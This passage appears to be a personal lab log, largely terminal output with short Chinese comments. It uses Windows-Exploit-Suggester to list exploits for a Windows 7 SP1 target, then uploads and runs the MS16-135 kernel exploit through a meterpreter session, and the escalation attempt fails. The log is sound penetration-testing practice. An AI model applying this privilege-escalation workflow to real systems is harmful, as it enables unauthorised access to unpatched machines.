└─# python2 windows-exploit-suggester.py --update
[*] initiating winsploit version 3.3...
[+] writing to file 2022-10-07-mssb.xls
[*] done
┌──(root㉿kali)-[~/Windows/exploiting/Windows-Exploit-Suggester]
└─# ls
2022-10-07-mssb.xls LICENSE.md README.md windows-exploit-suggester.py
Getting Error : please install and upgrade the python-xlrd library,参考sakyb7和cedelgadosalazar的回答。
1
2
3
4
5
wget https://bootstrap.pypa.io/pip/2.7/get-pip.py
python get-pip.py
python2 -m pip install --user xlrd==1.1.0
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
┌──(root㉿kali)-[~/Windows/exploiting/Windows-Exploit-Suggester]
└─# python2 windows-exploit-suggester.py --database 2022-10-07-mssb.xls --systeminfo /root/Tmp/win7.txt
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (ascii)
[*] querying database file for potential vulnerabilities
[*] comparing the 210 hotfix(es) against the 386 potential bulletins(s) with a database of 137 known exploits
[*] there are now 147 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 7 SP1 64-bit'
[*]
[E] MS16-135: Security Update for Windows Kernel-Mode Drivers (3199135) - Important
[*] https://www.exploit-db.com/exploits/40745/ -- Microsoft Windows Kernel - win32k Denial of Service (MS16-135)
[*] https://www.exploit-db.com/exploits/41015/ -- Microsoft Windows Kernel - 'win32k.sys' 'NtSetWindowLongPtr' Privilege Escalation (MS16-135) (2)
[*] https://github.com/tinysec/public/tree/master/CVE-2016-7255
[*]
[E] MS16-098: Security Update for Windows Kernel-Mode Drivers (3178466) - Important
[*] https://www.exploit-db.com/exploits/41020/ -- Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098)
[*]
[M] MS16-075: Security Update for Windows SMB Server (3164038) - Important
[*] https://github.com/foxglovesec/RottenPotato
[*] https://github.com/Kevin-Robertson/Tater
[*] https://bugs.chromium.org/p/project-zero/issues/detail?id=222 -- Windows: Local WebDAV NTLM Reflection Elevation of Privilege
[*] https://foxglovesecurity.com/2016/01/16/hot-potato/ -- Hot Potato - Windows Privilege Escalation
[*]
[E] MS16-074: Security Update for Microsoft Graphics Component (3164036) - Important
[*] https://www.exploit-db.com/exploits/39990/ -- Windows - gdi32.dll Multiple DIB-Related EMF Record Handlers Heap-Based Out-of-Bounds Reads/Memory Disclosure (MS16-074), PoC
[*] https://www.exploit-db.com/exploits/39991/ -- Windows Kernel - ATMFD.DLL NamedEscape 0x250C Pool Corruption (MS16-074), PoC
[*]
[E] MS16-063: Cumulative Security Update for Internet Explorer (3163649) - Critical
[*] https://www.exploit-db.com/exploits/39994/ -- Internet Explorer 11 - Garbage Collector Attribute Type Confusion (MS16-063), PoC
[*]
[M] MS16-016: Security Update for WebDAV to Address Elevation of Privilege (3136041) - Important
[*] https://www.exploit-db.com/exploits/40085/ -- MS16-016 mrxdav.sys WebDav Local Privilege Escalation, MSF
[*] https://www.exploit-db.com/exploits/39788/ -- Microsoft Windows 7 - WebDAV Privilege Escalation Exploit (MS16-016) (2), PoC
[*] https://www.exploit-db.com/exploits/39432/ -- Microsoft Windows 7 SP1 x86 - WebDAV Privilege Escalation (MS16-016) (1), PoC
[*]
[M] MS15-051: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (3057191) - Important
[*] https://github.com/hfiref0x/CVE-2015-1701, Win32k Elevation of Privilege Vulnerability, PoC
[*] https://www.exploit-db.com/exploits/37367/ -- Windows ClientCopyImage Win32k Exploit, MSF
[*]
[M] MS14-064: Vulnerabilities in Windows OLE Could Allow Remote Code Execution (3011443) - Critical
[*] https://www.exploit-db.com/exploits/37800// -- Microsoft Windows HTA (HTML Application) - Remote Code Execution (MS14-064), PoC
[*] http://www.exploit-db.com/exploits/35308/ -- Internet Explorer OLE Pre-IE11 - Automation Array Remote Code Execution / Powershell VirtualAlloc (MS14-064), PoC
[*] http://www.exploit-db.com/exploits/35229/ -- Internet Explorer <= 11 - OLE Automation Array Remote Code Execution (#1), PoC
[*] http://www.exploit-db.com/exploits/35230/ -- Internet Explorer < 11 - OLE Automation Array Remote Code Execution (MSF), MSF
[*] http://www.exploit-db.com/exploits/35235/ -- MS14-064 Microsoft Windows OLE Package Manager Code Execution Through Python, MSF
[*] http://www.exploit-db.com/exploits/35236/ -- MS14-064 Microsoft Windows OLE Package Manager Code Execution, MSF
[*]
[M] MS14-060: Vulnerability in Windows OLE Could Allow Remote Code Execution (3000869) - Important
[*] http://www.exploit-db.com/exploits/35055/ -- Windows OLE - Remote Code Execution 'Sandworm' Exploit (MS14-060), PoC
[*] http://www.exploit-db.com/exploits/35020/ -- MS14-060 Microsoft Windows OLE Package Manager Code Execution, MSF
[*]
[E] MS14-026: Vulnerability in .NET Framework Could Allow Elevation of Privilege (2958732) - Important
[*] http://www.exploit-db.com/exploits/35280/, -- .NET Remoting Services Remote Command Execution, PoC
[*]
[*] done
在Google上搜索MS16-135。
克隆该仓库。
1
2
3
4
5
6
┌──(root㉿kali)-[~/Windows/exploiting/windows-kernel-exploits/MS16-135]
└─# ls
40823 40823-source.zip 41015.c 41015.exe MS16-135.ps1 README.md Win10.png Win7.png Win81.png Win8.png
┌──(root㉿kali)-[~/Windows/exploiting/windows-kernel-exploits/MS16-135]
└─# pwd
/root/Windows/exploiting/windows-kernel-exploits/MS16-135
将41015.exe上传到目标Windows 7 SP1的C:\Temp目录中:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
meterpreter > cd C:\\Temp
meterpreter > pwd
C:\Temp
meterpreter > upload /root/Windows/exploiting/windows-kernel-exploits/MS16-135/41015.exe
[*] uploading : /root/Windows/exploiting/windows-kernel-exploits/MS16-135/41015.exe -> 41015.exe
[*] Uploaded 132.50 KiB of 132.50 KiB (100.0%): /root/Windows/exploiting/windows-kernel-exploits/MS16-135/41015.exe -> 41015.exe
[*] uploaded : /root/Windows/exploiting/windows-kernel-exploits/MS16-135/41015.exe -> 41015.exe
meterpreter > shell
Process 3492 created.
Channel 2 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Temp>whoami
whoami
iewin7\unpriv
C:\Temp>dir
dir
Volume in drive C is Windows 7
Volume Serial Number is 5812-32B0
Directory of C:\Temp
10/07/2022 07:06 PM <DIR> .
10/07/2022 07:06 PM <DIR> ..
10/07/2022 07:06 PM 135,680 41015.exe
10/07/2022 11:05 AM 7,168 payload64.exe
10/02/2022 10:46 PM 16 windowslog.txt
3 File(s) 142,864 bytes
2 Dir(s) 15,973,179,392 bytes free
通过shell执行41015.exe,提权失败,无法获得高权限的shell。
1
2
3
4
5
6
7
8
9
10
11
12
C:\Temp>.\41015.exe
.\41015.exe
Please enter an OS version
The following OS'es are supported:
[*] 7 - Windows 7
[*] 81 - Windows 8.1
[*] 10 - Windows 10 prior to build release 14393 (Anniversary Update)
[*] 12 - Windows 2012 R2
[*] For example: cve-2016-7255.exe 7 -- for Windows 7
C:\Temp>.\41015.exe 7
.\41015.exe 7
不想努力了。
